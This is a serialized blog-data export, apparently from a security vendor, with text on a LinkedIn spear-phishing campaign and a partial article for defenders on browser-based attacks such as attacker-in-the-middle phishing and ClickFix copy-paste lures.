{},[42805],{"data":42806,"marks":42807,"value":23523,"nodeType":864},{},[42808],{"type":899},{"data":42810,"content":42811,"nodeType":860},{},[42812],{"data":42813,"marks":42814,"value":23530,"nodeType":864},{},[],{"data":42816,"content":42817,"nodeType":860},{},[42818,42821,42828],{"data":42819,"marks":42820,"value":23537,"nodeType":864},{},[],{"data":42822,"content":42823,"nodeType":883},{"uri":23540},[42824],{"data":42825,"marks":42826,"value":23546,"nodeType":864},{},[42827],{"type":1455},{"data":42829,"marks":42830,"value":23550,"nodeType":864},{},[],{"data":42832,"content":42833,"nodeType":860},{},[42834],{"data":42835,"marks":42836,"value":23557,"nodeType":864},{},[],{"data":42838,"content":42839,"nodeType":860},{},[42840,42843,42850],{"data":42841,"marks":42842,"value":23564,"nodeType":864},{},[],{"data":42844,"content":42845,"nodeType":883},{"uri":23567},[42846],{"data":42847,"marks":42848,"value":23573,"nodeType":864},{},[42849],{"type":1455},{"data":42851,"marks":42852,"value":23577,"nodeType":864},{},[],{"data":42854,"content":42855,"nodeType":860},{},[42856],{"data":42857,"marks":42858,"value":23584,"nodeType":864},{},[],{"data":42860,"content":42863,"nodeType":996},{"target":42861},{"sys":42862},{"id":23589,"type":1001,"linkType":1002},[],{"data":42865,"content":42866,"nodeType":1005},{},[],{"data":42868,"content":42869,"nodeType":1009},{},[42870],{"data":42871,"marks":42872,"value":23601,"nodeType":864},{},[42873],{"type":899},{"data":42875,"content":42876,"nodeType":860},{},[42877],{"data":42878,"marks":42879,"value":23608,"nodeType":864},{},[],{"data":42881,"content":42882,"nodeType":941},{},[42883,42892,42901],{"data":42884,"content":42885,"nodeType":945},{},[42886],{"data":42887,"content":42888,"nodeType":860},{},[42889],{"data":42890,"marks":42891,"value":23621,"nodeType":864},{},[],{"data":42893,"content":42894,"nodeType":945},{},[42895],{"data":42896,"content":42897,"nodeType":860},{},[42898],{"data":42899,"marks":42900,"value":23631,"nodeType":864},{},[],{"data":42902,"content":42903,"nodeType":945},{},[42904],{"data":42905,"content":42906,"nodeType":860},{},[42907],{"data":42908,"marks":42909,"value":23641,"nodeType":864},{},[],{"data":42911,"content":42912,"nodeType":860},{},[42913],{"data":42914,"marks":42915,"value":23648,"nodeType":864},{},[],{"data":42917,"content":42918,"nodeType":860},{},[42919],{"data":42920,"marks":42921,"value":23655,"nodeType":864},{},[],{"data":42923,"content":42924,"nodeType":941},{},[42925,42944,42953],{"data":42926,"content":42927,"nodeType":945},{},[42928],{"data":42929,"content":42930,"nodeType":860},{},[42931,42934,42941],{"data":42932,"marks":42933,"value":23668,"nodeType":864},{},[],{"data":42935,"content":42936,"nodeType":883},{"uri":23671},[42937],{"data":42938,"marks":42939,"value":23677,"nodeType":864},{},[42940],{"type":1455},{"data":42942,"marks":42943,"value":23681,"nodeType":864},{},[],{"data":42945,"content":42946,"nodeType":945},{},[42947],{"data":42948,"content":42949,"nodeType":860},{},[42950],{"data":42951,"marks":42952,"value":23691,"nodeType":864},{},[],{"data":42954,"content":42955,"nodeType":945},{},[42956],{"data":42957,"content":42958,"nodeType":860},{},[42959],{"data":42960,"marks":42961,"value":23701,"nodeType":864},{},[],{"data":42963,"content":42964,"nodeType":860},{},[42965,42968,42974],{"data":42966,"marks":42967,"value":23708,"nodeType":864},{},[],{"data":42969,"content":42970,"nodeType":883},{"uri":19546},[42971],{"data":42972,"marks":42973,"value":23715,"nodeType":864},{},[],{"data":42975,"marks":42976,"value":23719,"nodeType":864},{},[],{"data":42978,"content":42979,"nodeType":1116},{},[42980],{"data":42981,"content":42982,"nodeType":860},{},[42983],{"data":42984,"marks":42985,"value":23729,"nodeType":864},{},[],{"data":42987,"content":42988,"nodeType":860},{},[42989],{"data":42990,"marks":42991,"value":23736,"nodeType":864},{},[],{"data":42993,"content":42994,"nodeType":1005},{},[],{"data":42996,"content":42997,"nodeType":1009},{},[42998],{"data":42999,"marks":43000,"value":23747,"nodeType":864},{},[43001],{"type":899},{"data":43003,"content":43004,"nodeType":860},{},[43005,43008,43015],{"data":43006,"marks":43007,"value":23754,"nodeType":864},{},[],{"data":43009,"content":43010,"nodeType":883},{"uri":23757},[43011],{"data":43012,"marks":43013,"value":23763,"nodeType":864},{},[43014],{"type":1455},{"data":43016,"marks":43017,"value":23767,"nodeType":864},{},[],{"data":43019,"content":43020,"nodeType":860},{},[43021],{"data":43022,"marks":43023,"value":23774,"nodeType":864},{},[],{"data":43025,"content":43026,"nodeType":860},{},[43027],{"data":43028,"marks":43029,"value":23781,"nodeType":864},{},[],{"data":43031,"content":43034,"nodeType":996},{"target":43032},{"sys":43033},{"id":23786,"type":1001,"linkType":1002},[],{"data":43036,"content":43037,"nodeType":1005},{},[],{"data":43039,"content":43040,"nodeType":1009},{},[43041],{"data":43042,"marks":43043,"value":23798,"nodeType":864},{},[43044],{"type":899},{"data":43046,"content":43047,"nodeType":860},{},[43048,43051,43058],{"data":43049,"marks":43050,"value":23805,"nodeType":864},{},[],{"data":43052,"content":43053,"nodeType":883},{"uri":23808},[43054],{"data":43055,"marks":43056,"value":23814,"nodeType":864},{},[43057],{"type":1455},{"data":43059,"marks":43060,"value":23818,"nodeType":864},{},[],{"data":43062,"content":43063,"nodeType":860},{},[43064,43067,43074,43077,43084],{"data":43065,"marks":43066,"value":16314,"nodeType":864},{},[],{"data":43068,"content":43069,"nodeType":883},{"uri":10269},[43070],{"data":43071,"marks":43072,"value":10275,"nodeType":864},{},[43073],{"type":1455},{"data":43075,"marks":43076,"value":19754,"nodeType":864},{},[],{"data":43078,"content":43079,"nodeType":883},{"uri":1700},[43080],{"data":43081,"marks":43082,"value":10299,"nodeType":864},{},[43083],{"type":1455},{"data":43085,"marks":43086,"value":2924,"nodeType":864},{},[],{"data":43088,"content":43091,"nodeType":996},{"target":43089},{"sys":43090},{"id":23404,"type":1001,"linkType":1002},[],{"data":43093,"content":43094,"nodeType":860},{},[43095],{"data":43096,"marks":43097,"value":21,"nodeType":864},{},[],{"items":43099},[43100,43102],{"sys":43101,"name":342},{"id":6596},{"sys":43103,"name":6593},{"id":6592},{"items":43105},[43106],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":43107},{"url":2740},"why-attackers-are-moving-beyond-email-based-phishing","blog/why-attackers-are-moving-beyond-email-based-phishing",{"json":43111},{"data":43112,"content":43113,"nodeType":856},{},[43114],{"data":43115,"content":43116,"nodeType":860},{},[43117],{"data":43118,"marks":43119,"value":43120,"nodeType":864},{},[],"Attackers are increasingly sending phishing links over non-email delivery channels like social media, instant messaging apps, and malicious search engine ads. In this article, we explore why phishing attacks are moving away from exclusively email-based delivery, and what this means for security teams. ","Why phishing attacks are moving away from exclusively email-based delivery, and what this means for security teams. \n",{"id":43123,"publishedAt":43124},"4wtqKNN8D4tvbICAQ17L1Z","2026-08-12T11:53:47.767Z",{"items":43126},[43127,43129],{"sys":43128,"name":6593},{"id":6592},{"sys":43130,"name":342},{"id":6596},{"items":43132},[43133,43135,43137,43139,43141,43143,43145,43147,43149,43151,43153,43155,43157,43159,43161],{"sys":43134,"name":279,"slug":280,"tier":31},{"id":276},{"sys":43136,"name":519,"slug":520,"tier":31},{"id":516},{"sys":43138,"name":342,"slug":343,"tier":31},{"id":339},{"sys":43140,"name":642,"slug":643,"tier":31},{"id":639},{"sys":43142,"name":475,"slug":476,"tier":45},{"id":472},{"sys":43144,"name":261,"slug":262,"tier":45},{"id":258},{"sys":43146,"name":466,"slug":467,"tier":45},{"id":463},{"sys":43148,"name":571,"slug":572,"tier":45},{"id":568},{"sys":43150,"name":440,"slug":441,"tier":45},{"id":437},{"sys":43152,"name":563,"slug":564,"tier":45},{"id":560},{"sys":43154,"name":607,"slug":608,"tier":45},{"id":604},{"sys":43156,"name":324,"slug":325,"tier":45},{"id":321},{"sys":43158,"name":431,"slug":432,"tier":45},{"id":428},{"sys":43160,"name":422,"slug":423,"tier":45},{"id":419},{"sys":43162,"name":315,"slug":316,"tier":45},{"id":312},"fbpSzWbg3UO8kZAw1BoRcf-UuQx5faRvyNk3RZcKfUQ",{"id":43165,"title":39870,"authorsCollection":43166,"content":43171,"extension":228,"faqItemsCollection":43691,"faqTitle":59,"featured":6,"hashTags":59,"meta":43693,"metaTitle":43694,"ogImage":59,"postType":5740,"publishedDate":39872,"relatedBlogPostsCollection":43695,"slug":39873,"stem":45874,"subtitle":59,"summary":45875,"synopsis":39871,"sys":45885,"tagsCollection":45887,"topicsCollection":45893,"__hash__":45923},"blog/blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack.json",{"items":43167},[43168],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":43169,"profilePicture":43170},[18135],{"url":2740},{"json":43172,"links":43638},{"data":43173,"content":43174,"nodeType":856},{},[43175,43180,43186,43192,43198,43201,43208,43214,43230,43235,43241,43246,43252,43258,43263,43276,43281,43287,43292,43295,43302,43308,43315,43331,43337,43343,43350,43366,43373,43389,43396,43412,43417,43420,43427,43433,43472,43478,43484,43487,43494,43500,43536,43539,43546,43552,43593,43616,43622],{"data":43176,"content":43179,"nodeType":996},{"target":43177},{"sys":43178},{"id":39342,"type":1001,"linkType":1002},[],{"data":43181,"content":43182,"nodeType":860},{},[43183],{"data":43184,"marks":43185,"value":39350,"nodeType":864},{},[],{"data":43187,"content":43188,"nodeType":860},{},[43189],{"data":43190,"marks":43191,"value":39357,"nodeType":864},{},[],{"data":43193,"content":43194,"nodeType":860},{},[43195],{"data":43196,"marks":43197,"value":39364,"nodeType":864},{},[],{"data":43199,"content":43200,"nodeType":1005},{},[],{"data":43202,"content":43203,"nodeType":1009},{},[43204],{"data":43205,"marks":43206,"value":5002,"nodeType":864},{},[43207],{"type":899},{"data":43209,"content":43210,"nodeType":860},{},[43211],{"data":43212,"marks":43213,"value":39381,"nodeType":864},{},[],{"data":43215,"content":43216,"nodeType":860},{},[43217,43220,43227],{"data":43218,"marks":43219,"value":39388,"nodeType":864},{},[],{"data":43221,"content":43222,"nodeType":883},{"uri":39391},[43223],{"data":43224,"marks":43225,"value":39397,"nodeType":864},{},[43226],{"type":1455},{"data":43228,"marks":43229,"value":39401,"nodeType":864},{},[],{"data":43231,"content":43234,"nodeType":996},{"target":43232},{"sys":43233},{"id":39406,"type":1001,"linkType":1002},[],{"data":43236,"content":43237,"nodeType":860},{},[43238],{"data":43239,"marks":43240,"value":39414,"nodeType":864},{},[],{"data":43242,"content":43245,"nodeType":996},{"target":43243},{"sys":43244},{"id":39419,"type":1001,"linkType":1002},[],{"data":43247,"content":43248,"nodeType":860},{},[43249],{"data":43250,"marks":43251,"value":39427,"nodeType":864},{},[],{"data":43253,"content":43254,"nodeType":860},{},[43255],{"data":43256,"marks":43257,"value":39434,"nodeType":864},{},[],{"data":43259,"content":43262,"nodeType":996},{"target":43260},{"sys":43261},{"id":39439,"type":1001,"linkType":1002},[],{"data":43264,"content":43265,"nodeType":860},{},[43266,43269,43273],{"data":43267,"marks":43268,"value":39447,"nodeType":864},{},[],{"data":43270,"marks":43271,"value":39452,"nodeType":864},{},[43272],{"type":899},{"data":43274,"marks":43275,"value":39456,"nodeType":864},{},[],{"data":43277,"content":43280,"nodeType":996},{"target":43278},{"sys":43279},{"id":39461,"type":1001,"linkType":1002},[],{"data":43282,"content":43283,"nodeType":860},{},[43284],{"data":43285,"marks":43286,"value":39469,"nodeType":864},{},[],{"data":43288,"content":43291,"nodeType":996},{"target":43289},{"sys":43290},{"id":39474,"type":1001,"linkType":1002},[],{"data":43293,"content":43294,"nodeType":1005},{},[],{"data":43296,"content":43297,"nodeType":1009},{},[43298],{"data":43299,"marks":43300,"value":39486,"nodeType":864},{},[43301],{"type":899},{"data":43303,"content":43304,"nodeType":860},{},[43305],{"data":43306,"marks":43307,"value":39493,"nodeType":864},{},[],{"data":43309,"content":43310,"nodeType":1312},{},[43311],{"data":43312,"marks":43313,"value":39501,"nodeType":864},{},[43314],{"type":899},{"data":43316,"content":43317,"nodeType":860},{},[43318,43321,43328],{"data":43319,"marks":43320,"value":39508,"nodeType":864},{},[],{"data":43322,"content":43323,"nodeType":883},{"uri":38998},[43324],{"data":43325,"marks":43326,"value":39516,"nodeType":864},{},[43327],{"type":1455},{"data":43329,"marks":43330,"value":39520,"nodeType":864},{},[],{"data":43332,"content":43333,"nodeType":860},{},[43334],{"data":43335,"marks":43336,"value":39527,"nodeType":864},{},[],{"data":43338,"content":43339,"nodeType":860},{},[43340],{"data":43341,"marks":43342,"value":39534,"nodeType":864},{},[],{"data":43344,"content":43345,"nodeType":1312},{},[43346],{"data":43347,"marks":43348,"value":39542,"nodeType":864},{},[43349],{"type":899},{"data":43351,"content":43352,"nodeType":860},{},[43353,43356,43363],{"data":43354,"marks":43355,"value":39549,"nodeType":864},{},[],{"data":43357,"content":43358,"nodeType":883},{"uri":39038},[43359],{"data":43360,"marks":43361,"value":39557,"nodeType":864},{},[43362],{"type":1455},{"data":43364,"marks":43365,"value":39561,"nodeType":864},{},[],{"data":43367,"content":43368,"nodeType":1312},{},[43369],{"data":43370,"marks":43371,"value":39569,"nodeType":864},{},[43372],{"type":899},{"data":43374,"content":43375,"nodeType":860},{},[43376,43379,43386],{"data":43377,"marks":43378,"value":39576,"nodeType":864},{},[],{"data":43380,"content":43381,"nodeType":883},{"uri":35537},[43382],{"data":43383,"marks":43384,"value":39584,"nodeType":864},{},[43385],{"type":1455},{"data":43387,"marks":43388,"value":39588,"nodeType":864},{},[],{"data":43390,"content":43391,"nodeType":1312},{},[43392],{"data":43393,"marks":43394,"value":39596,"nodeType":864},{},[43395],{"type":899},{"data":43397,"content":43398,"nodeType":860},{},[43399,43402,43409],{"data":43400,"marks":43401,"value":39603,"nodeType":864},{},[],{"data":43403,"content":43404,"nodeType":883},{"uri":7248},[43405],{"data":43406,"marks":43407,"value":39611,"nodeType":864},{},[43408],{"type":1455},{"data":43410,"marks":43411,"value":39615,"nodeType":864},{},[],{"data":43413,"content":43416,"nodeType":996},{"target":43414},{"sys":43415},{"id":27224,"type":1001,"linkType":1002},[],{"data":43418,"content":43419,"nodeType":1005},{},[],{"data":43421,"content":43422,"nodeType":1009},{},[43423],{"data":43424,"marks":43425,"value":39631,"nodeType":864},{},[43426],{"type":899},{"data":43428,"content":43429,"nodeType":860},{},[43430],{"data":43431,"marks":43432,"value":39638,"nodeType":864},{},[],{"data":43434,"content":43435,"nodeType":941},{},[43436,43445,43454,43463],{"data":43437,"content":43438,"nodeType":945},{},[43439],{"data":43440,"content":43441,"nodeType":860},{},[43442],{"data":43443,"marks":43444,"value":39651,"nodeType":864},{},[],{"data":43446,"content":43447,"nodeType":945},{},[43448],{"data":43449,"content":43450,"nodeType":860},{},[43451],{"data":43452,"marks":43453,"value":39661,"nodeType":864},{},[],{"data":43455,"content":43456,"nodeType":945},{},[43457],{"data":43458,"content":43459,"nodeType":860},{},[43460],{"data":43461,"marks":43462,"value":39671,"nodeType":864},{},[],{"data":43464,"content":43465,"nodeType":945},{},[43466],{"data":43467,"content":43468,"nodeType":860},{},[43469],{"data":43470,"marks":43471,"value":39681,"nodeType":864},{},[],{"data":43473,"content":43474,"nodeType":860},{},[43475],{"data":43476,"marks":43477,"value":39688,"nodeType":864},{},[],{"data":43479,"content":43480,"nodeType":860},{},[43481],{"data":43482,"marks":43483,"value":39695,"nodeType":864},{},[],{"data":43485,"content":43486,"nodeType":1005},{},[],{"data":43488,"content":43489,"nodeType":1009},{},[43490],{"data":43491,"marks":43492,"value":7114,"nodeType":864},{},[43493],{"type":899},{"data":43495,"content":43496,"nodeType":860},{},[43497],{"data":43498,"marks":43499,"value":39712,"nodeType":864},{},[],{"data":43501,"content":43502,"nodeType":860},{},[43503,43506,43513,43516,43523,43526,43533],{"data":43504,"marks":43505,"value":39719,"nodeType":864},{},[],{"data":43507,"content":43508,"nodeType":883},{"uri":39722},[43509],{"data":43510,"marks":43511,"value":39728,"nodeType":864},{},[43512],{"type":1455},{"data":43514,"marks":43515,"value":3731,"nodeType":864},{},[],{"data":43517,"content":43518,"nodeType":883},{"uri":39734},[43519],{"data":43520,"marks":43521,"value":39740,"nodeType":864},{},[43522],{"type":1455},{"data":43524,"marks":43525,"value":39744,"nodeType":864},{},[],{"data":43527,"content":43528,"nodeType":883},{"uri":19131},[43529],{"data":43530,"marks":43531,"value":39752,"nodeType":864},{},[43532],{"type":1455},{"data":43534,"marks":43535,"value":39756,"nodeType":864},{},[],{"data":43537,"content":43538,"nodeType":1005},{},[],{"data":43540,"content":43541,"nodeType":1009},{},[43542],{"data":43543,"marks":43544,"value":3578,"nodeType":864},{},[43545],{"type":899},{"data":43547,"content":43548,"nodeType":860},{},[43549],{"data":43550,"marks":43551,"value":39773,"nodeType":864},{},[],{"data":43553,"content":43554,"nodeType":941},{},[43555,43574],{"data":43556,"content":43557,"nodeType":945},{},[43558],{"data":43559,"content":43560,"nodeType":860},{},[43561,43564,43571],{"data":43562,"marks":43563,"value":21,"nodeType":864},{},[],{"data":43565,"content":43566,"nodeType":883},{"uri":39788},[43567],{"data":43568,"marks":43569,"value":39794,"nodeType":864},{},[43570],{"type":1455},{"data":43572,"marks":43573,"value":21,"nodeType":864},{},[],{"data":43575,"content":43576,"nodeType":945},{},[43577],{"data":43578,"content":43579,"nodeType":860},{},[43580,43583,43590],{"data":43581,"marks":43582,"value":21,"nodeType":864},{},[],{"data":43584,"content":43585,"nodeType":883},{"uri":39809},[43586],{"data":43587,"marks":43588,"value":39815,"nodeType":864},{},[43589],{"type":1455},{"data":43591,"marks":43592,"value":21,"nodeType":864},{},[],{"data":43594,"content":43595,"nodeType":860},{},[43596,43599,43603,43606,43613],{"data":43597,"marks":43598,"value":39825,"nodeType":864},{},[],{"data":43600,"marks":43601,"value":39830,"nodeType":864},{},[43602],{"type":899},{"data":43604,"marks":43605,"value":39834,"nodeType":864},{},[],{"data":43607,"content":43608,"nodeType":883},{"uri":7124},[43609],{"data":43610,"marks":43611,"value":28345,"nodeType":864},{},[43612],{"type":1455},{"data":43614,"marks":43615,"value":39845,"nodeType":864},{},[],{"data":43617,"content":43618,"nodeType":860},{},[43619],{"data":43620,"marks":43621,"value":39852,"nodeType":864},{},[],{"data":43623,"content":43624,"nodeType":860},{},[43625,43628,43635],{"data":43626,"marks":43627,"value":39859,"nodeType":864},{},[],{"data":43629,"content":43630,"nodeType":883},{"uri":5642},[43631],{"data":43632,"marks":43633,"value":10299,"nodeType":864},{},[43634],{"type":1455},{"data":43636,"marks":43637,"value":2924,"nodeType":864},{},[],{"entries":43639},{"hyperlink":43640,"inline":43641,"block":43642},[],[],[43643,43665,43668,43673,43678,43681,43689],{"sys":43644,"__typename":1740,"content":43645,"name":43664,"title":59},{"id":39342},{"json":43646},{"nodeType":856,"data":43647,"content":43648},{},[43649,43657],{"nodeType":860,"data":43650,"content":43651},{},[43652],{"nodeType":864,"value":43653,"marks":43654,"data":43656},"Update 15th September:",[43655],{"type":899},{},{"nodeType":860,"data":43658,"content":43659},{},[43660],{"nodeType":864,"value":43661,"marks":43662,"data":43663},"Since releasing this article we have observed further attacks using almost identical TTPs across a number of Push customers, specifically targeting technology firm executives. We've also had a number of people that aren't Push customers reach out to us after seeing attacks that are clearly part of the same campaign. So, we've added some additional information to help other security teams to investigate whether they have also been targeted. ",[],{},"Linkedin phishing attack insight box",{"sys":43666,"__typename":1724,"title":41606,"caption":41606,"layoutMode":59,"file":43667},{"id":39406},{"url":41608,"width":41609,"height":41610},{"sys":43669,"__typename":1724,"title":43670,"caption":43670,"layoutMode":59,"file":43671},{"id":39419},"Microsoft Dynamics page designed to look like a Google Drive form.",{"url":43672,"width":1736,"height":8971},"https://images.ctfassets.net/y1cdw1ablpvd/5TotEj06E6rZiR8jhY4QY1/7d8cf413dac2d0c5e078553f24ddb929/image4.png",{"sys":43674,"__typename":1724,"title":43675,"caption":43675,"layoutMode":59,"file":43676},{"id":39439},"Custom CAPTCHA pages are becoming increasingly common.",{"url":43677,"width":1736,"height":8971},"https://images.ctfassets.net/y1cdw1ablpvd/4yiniKsw5THFJNG7djVUmp/4fc66a46477fe249a5506521dd80d4a2/image1.png",{"sys":43679,"__typename":1724,"title":41613,"caption":41613,"layoutMode":59,"file":43680},{"id":39461},{"url":41615,"width":1736,"height":8971},{"sys":43682,"__typename":1724,"title":43683,"caption":43684,"layoutMode":59,"file":43685},{"id":39474},"Phishing incident timeline","A large number of redirects were used across different sites to obfuscate the phishing link and prevent the phishing URL being linked to the original URL delivered to the victim.",{"url":43686,"width":43687,"height":43688},"https://images.ctfassets.net/y1cdw1ablpvd/6Xbed976bd7yltgfbAp9GK/3a040bf988330617690d53716fe3bd7a/Frame_627926__2_.png",3660,4200,{"sys":43690,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},{"items":43692},[],{},"How Push stopped a high risk LinkedIn spear-phishing attack",{"items":43696},[43697,44353,44875],{"__typename":2059,"sys":43698,"content":43700,"title":44339,"synopsis":44340,"hashTags":59,"publishedDate":44341,"slug":44342,"tagsCollection":44343,"authorsCollection":44349},{"id":43699},"62Zyr35VUmijkpupWk3hoD",{"json":43701},{"data":43702,"content":43703,"nodeType":856},{},[43704,43720,43727,43730,43738,43745,43752,43772,43778,43785,43792,43799,43806,43809,43817,43824,43830,43837,43845,43852,43859,43865,43884,43890,43897,43903,43910,43915,43918,43926,43942,43949,43979,43986,43993,43999,44006,44013,44020,44023,44031,44047,44053,44060,44067,44073,44080,44087,44090,44098,44105,44125,44169,44176,44183,44190,44193,44201,44208,44215,44222,44225,44233,44240,44271,44291,44298,44301,44308,44315,44322],{"data":43705,"content":43706,"nodeType":860},{},[43707,43711,43716],{"data":43708,"marks":43709,"value":43710,"nodeType":864},{},[],"The view that \"the browser is the new endpoint\" and \"the new battleground for cyber attacks\" is becoming increasingly advocated by security leaders. But what does this ",{"data":43712,"marks":43713,"value":43715,"nodeType":864},{},[43714],{"type":2246},"actually",{"data":43717,"marks":43718,"value":43719,"nodeType":864},{},[]," mean for security teams? ",{"data":43721,"content":43722,"nodeType":860},{},[43723],{"data":43724,"marks":43725,"value":43726,"nodeType":864},{},[],"In this article, we’re cutting out the jargon to explore what a browser-based attack is, and what’s required for effective detection and response. ",{"data":43728,"content":43729,"nodeType":1005},{},[],{"data":43731,"content":43732,"nodeType":1009},{},[43733],{"data":43734,"marks":43735,"value":43737,"nodeType":864},{},[43736],{"type":899},"What is the goal of a browser-based attack?   ",{"data":43739,"content":43740,"nodeType":860},{},[43741],{"data":43742,"marks":43743,"value":43744,"nodeType":864},{},[],"First, it’s important to establish what the point of a browser-based attack is.",{"data":43746,"content":43747,"nodeType":860},{},[43748],{"data":43749,"marks":43750,"value":43751,"nodeType":864},{},[],"In most scenarios, attackers don’t think of themselves as attacking your web browser. Their end-goal is to compromise your business apps and data. That means going after the third-party apps and services that are now the backbone of business IT — and therefore the top target for attackers. ",{"data":43753,"content":43754,"nodeType":860},{},[43755,43759,43768],{"data":43756,"marks":43757,"value":43758,"nodeType":864},{},[],"The most common attack path today sees attackers log into third-party services, dump the data, and monetize it through extortion. You need only look at last year’s ",{"data":43760,"content":43762,"nodeType":883},{"uri":43761},"https://pushsecurity.com/blog/snowflake-retro?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[43763],{"data":43764,"marks":43765,"value":43767,"nodeType":864},{},[43766],{"type":1455},"Snowflake",{"data":43769,"marks":43770,"value":43771,"nodeType":864},{},[]," customer breaches or the still-ongoing Salesforce attacks to see the impact.",{"data":43773,"content":43777,"nodeType":996},{"target":43774},{"sys":43775},{"id":43776,"type":1001,"linkType":1002},"5agrVXzEdwALmew2F5SPDp",[],{"data":43779,"content":43780,"nodeType":860},{},[43781],{"data":43782,"marks":43783,"value":43784,"nodeType":864},{},[],"The most logical way to do this is by targeting users of those apps. And because of the changes to working practices, your users are more accessible than ever to external attackers.",{"data":43786,"content":43787,"nodeType":860},{},[43788],{"data":43789,"marks":43790,"value":43791,"nodeType":864},{},[],"Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content (at least, without significantly impeding their ability to do their jobs).",{"data":43793,"content":43794,"nodeType":860},{},[43795],{"data":43796,"marks":43797,"value":43798,"nodeType":864},{},[],"Given that the browser is the place where business apps are accessed and used, it makes sense that attacks are increasingly playing out there too. ",{"data":43800,"content":43801,"nodeType":860},{},[43802],{"data":43803,"marks":43804,"value":43805,"nodeType":864},{},[],"With that covered off, let’s take a closer look at the most prevalent browser-based attack techniques being used by attackers in the wild today.",{"data":43807,"content":43808,"nodeType":1005},{},[],{"data":43810,"content":43811,"nodeType":1009},{},[43812],{"data":43813,"marks":43814,"value":43816,"nodeType":864},{},[43815],{"type":899},"The 6 key browser-based attacks that security teams need to know about",{"data":43818,"content":43819,"nodeType":860},{},[43820],{"data":43821,"marks":43822,"value":43823,"nodeType":864},{},[],"Attacks that target users in their web browsers have seen an unprecedented rise in recent years. ",{"data":43825,"content":43829,"nodeType":996},{"target":43826},{"sys":43827},{"id":43828,"type":1001,"linkType":1002},"4ogNqZdObSIJXavHP44lom",[],{"data":43831,"content":43832,"nodeType":860},{},[43833],{"data":43834,"marks":43835,"value":43836,"nodeType":864},{},[],"Here's our breakdown of the top 6 browser-based attacks that should be on every security team's radar right now. ",{"data":43838,"content":43839,"nodeType":1312},{},[43840],{"data":43841,"marks":43842,"value":43844,"nodeType":864},{},[43843],{"type":899},"1. Phishing for credentials and sessions",{"data":43846,"content":43847,"nodeType":860},{},[43848],{"data":43849,"marks":43850,"value":43851,"nodeType":864},{},[],"The most direct way for an attacker to compromise a business application is to phish a user of that app. You might not necessarily think of phishing as a browser-based attack, but that’s exactly what it is today. ",{"data":43853,"content":43854,"nodeType":860},{},[43855],{"data":43856,"marks":43857,"value":43858,"nodeType":864},{},[],"Phishing tooling and infrastructure has evolved a lot in the past decade, while the changes to business IT means there are both many more vectors for phishing attack delivery, and apps and identities to target. Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration. ",{"data":43860,"content":43864,"nodeType":996},{"target":43861},{"sys":43862},{"id":43863,"type":1001,"linkType":1002},"3SrKOgpedLMQRpKIZqUQur",[],{"data":43866,"content":43867,"nodeType":860},{},[43868,43872,43880],{"data":43869,"marks":43870,"value":43871,"nodeType":864},{},[],"Whereas phishing was once entirely focused on credential theft, modern phishing attacks see the attacker intercept the victim’s session on the target app, using reverse-proxy Attacker-in-the-Middle kits that are the standard choice for attackers today. This means most forms of MFA can be bypassed, with the exception of passkeys (though attackers are finding ways to work around passkeys using ",{"data":43873,"content":43875,"nodeType":883},{"uri":43874},"https://pushsecurity.com/blog/mfa-downgrade-attacks/?utm_source=bleeping-computer&utm_medium=sponsored-content&utm_term=article",[43876],{"data":43877,"marks":43878,"value":26813,"nodeType":864},{},[43879],{"type":1455},{"data":43881,"marks":43882,"value":43883,"nodeType":864},{},[],"). ",{"data":43885,"content":43889,"nodeType":996},{"target":43886},{"sys":43887},{"id":43888,"type":1001,"linkType":1002},"2sOFEdAwQZjWOGzNAlGavb",[],{"data":43891,"content":43892,"nodeType":860},{},[43893],{"data":43894,"marks":43895,"value":43896,"nodeType":864},{},[],"There are other key differences to be aware of too. Today, phishing operates on an industrial scale, using an array of obfuscation and detection evasion techniques. The latest generation of fully customized AitM phishing kits are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",{"data":43898,"content":43899,"nodeType":860},{},[43900],{"data":43901,"marks":43902,"value":24154,"nodeType":864},{},[],{"data":43904,"content":43905,"nodeType":860},{},[43906],{"data":43907,"marks":43908,"value":43909,"nodeType":864},{},[],"These changes make phishing more effective than ever, and increasingly difficult to detect and block without being able to observe and analyze web pages that a user interacts with in real time — something only possible with browser-level visibility. ",{"data":43911,"content":43914,"nodeType":996},{"target":43912},{"sys":43913},{"id":41197,"type":1001,"linkType":1002},[],{"data":43916,"content":43917,"nodeType":1005},{},[],{"data":43919,"content":43920,"nodeType":1312},{},[43921],{"data":43922,"marks":43923,"value":43925,"nodeType":864},{},[43924],{"type":899},"2. Malicious copy and paste (aka. ClickFix, FileFix, etc.)",{"data":43927,"content":43928,"nodeType":860},{},[43929,43932,43939],{"data":43930,"marks":43931,"value":23883,"nodeType":864},{},[],{"data":43933,"content":43934,"nodeType":883},{"uri":23886},[43935],{"data":43936,"marks":43937,"value":315,"nodeType":864},{},[43938],{"type":1455},{"data":43940,"marks":43941,"value":10094,"nodeType":864},{},[],{"data":43943,"content":43944,"nodeType":860},{},[43945],{"data":43946,"marks":43947,"value":43948,"nodeType":864},{},[],"Originally known as “Fake CAPTCHA”, these attacks attempt to trick users into running malicious commands on their device — typically by solving some form of verification challenge in the browser. ",{"data":43950,"content":43951,"nodeType":860},{},[43952,43956,43963,43967,43976],{"data":43953,"marks":43954,"value":43955,"nodeType":864},{},[],"In reality, by solving the challenge, the victim is actually copying malicious code from the page clipboard and running it on their device. It typically gives the victim instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Terminal, or PowerShell. Variants such as ",{"data":43957,"content":43958,"nodeType":883},{"uri":24047},[43959],{"data":43960,"marks":43961,"value":24053,"nodeType":864},{},[43962],{"type":1455},{"data":43964,"marks":43965,"value":43966,"nodeType":864},{},[]," have also emerged which instead uses the File Explorer Address Bar to execute OS commands, while recent examples have seen this 